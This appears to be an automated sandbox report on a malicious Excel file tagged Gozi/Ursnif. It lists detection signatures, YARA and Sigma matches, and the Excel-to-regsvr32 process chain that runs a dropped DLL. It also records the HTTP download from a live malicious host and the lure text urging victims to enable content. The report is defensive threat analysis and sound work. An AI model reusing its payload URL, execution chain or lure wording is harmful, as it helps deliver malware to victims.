Loading ...

Play interactive tourEdit tour

Analysis Report document-1444032431.xls

Overview

General Information

Sample Name:document-1444032431.xls
Analysis ID:324312
MD5:407b70bcaef4d41cc7f63ceb6412a692
SHA1:2cc134d5c5ea93bbbb0212f8d692484cc76766bd
SHA256:6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1376 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5648 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1444032431.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1444032431.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1376, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 5648

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1444032431.xlsVirustotal: Detection: 35%Perma Link
    Source: document-1444032431.xlsReversingLabs: Detection: 44%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 1MB later: 109MB
    Source: global trafficDNS query: name: me48.ru
    Source: global trafficTCP traffic: 192.168.2.3:49725 -> 188.225.24.87:80
    Source: global trafficTCP traffic: 192.168.2.3:49725 -> 188.225.24.87:80
    Source: Joe Sandbox ViewIP Address: 188.225.24.87 188.225.24.87
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: me48.ruConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: me48.ruConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: me48.ru
    Source: document-1444032431.xlsString found in binary or memory: http://me48.ru/ds/231120.gif
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.aadrm.com/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.office.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.onedrive.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://augloop.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cdn.entity.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://clients.config.office.net/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://config.edge.skype.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cortana.ai
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://cr.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://devnull.onenote.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://directory.services.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://graph.windows.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://graph.windows.net/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://lifecycle.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://login.windows.local
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://management.azure.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://management.azure.com/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://messaging.office.com/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://officeapps.live.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://onedrive.live.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://outlook.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://outlook.office365.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://settings.outlook.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://tasks.office.com
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content ^ X J14 " i 7c v' J& A A B C D E E G H I K L I M I N I O I P I Q R S T " 301
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1444032431.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1444032431.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: document-1444032431.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/6@1/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3D4E5D40-FBC6-4331-AD2E-B805E1643E29} - OProcSessId.datJump to behavior
    Source: document-1444032431.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1444032431.xlsVirustotal: Detection: 35%
    Source: document-1444032431.xlsReversingLabs: Detection: 44%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
